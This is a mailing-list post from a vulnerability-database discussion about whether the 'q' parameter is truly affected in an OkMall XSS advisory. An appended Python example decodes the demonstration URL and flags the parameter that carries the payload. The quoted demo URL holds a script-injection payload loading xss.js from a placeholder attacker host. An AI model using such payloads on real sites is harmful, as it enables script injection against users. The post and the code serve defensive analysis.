[VIM] OkMall - "q" parameter not affected?
Steven M. Christey
coley at mitre.org
Mon Jun 12 20:21:59 EDT 2006
Ref:
BUGTRAQ:20060608 okscripts.com - XSS Vulns
URL:http://www.securityfocus.com/archive/1/436561
Some vdb's are reporting "q" parameter as affected.
Relevant demonstration URL is:
okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
So the "q" value is:
a%20%20b%20e%20
which, when decoded, is just a bunch of whitespace:
a  b e
Thoughts? Did someone do post-disclosure analysis on this one?
- Steve
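The post-disclosure check described above, as an added example that is not part of the original VIM post or of the okscripts.com advisory: percent-decode every parameter in the quoted demonstration URL and report which ones actually carry a script payload. The demo URL is the one from the post; the classification buckets and the marker regex (which accepts the bracketed [SCRIPT] spelling that Bugtraq posts use in place of <SCRIPT>) are this example's own assumptions.

```python
"""Added example: triage an XSS demonstration URL parameter by parameter.
Not code from the VIM post or from the OkMall product."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Demonstration URL as quoted in the post, joined onto one line.
DEMO_URL = ("okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&"
            "page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]")

# Assumption: an injected script tag shows up as <script ...> or, in
# mail-filter-friendly advisories, as [SCRIPT ...]; match both spellings.
SCRIPT_RE = re.compile(r"[<\[]/?script\b", re.IGNORECASE)


def decode_params(url):
    """Return (name, decoded_value) pairs from the URL's query string."""
    query = urlsplit(url).query
    # parse_qsl already percent-decodes once; a second unquote pass exposes
    # double-encoded payloads and is a no-op on singly encoded values.
    return [(name, unquote(value))
            for name, value in parse_qsl(query, keep_blank_values=True)]


def classify(value):
    """Bucket a decoded value: does it carry markup, or just text/whitespace?"""
    if SCRIPT_RE.search(value):
        return "script payload"
    if value.strip() == "":
        return "whitespace only"
    if re.fullmatch(r"[\w\s]*", value):
        return "plain text"
    return "other"


def triage(url):
    """Map each parameter name to (decoded value, classification)."""
    return {name: (value, classify(value)) for name, value in decode_params(url)}


def affected_params(url):
    """Names of parameters whose decoded value contains a script payload."""
    return [name for name, (_, kind) in triage(url).items()
            if kind == "script payload"]


if __name__ == "__main__":
    for name, (value, kind) in triage(DEMO_URL).items():
        print(f"{name:6} {kind:16} {value!r}")
    print("affected:", affected_params(DEMO_URL))
```

Run against the demo URL, this lists `page` as the only parameter carrying the [SCRIPT] payload; `q` decodes to letters separated by spaces and `mcdir` to `5`, neither containing a character that could open a tag or break out of an attribute, which is the kind of evidence a VDB entry needs before it names a parameter as affected.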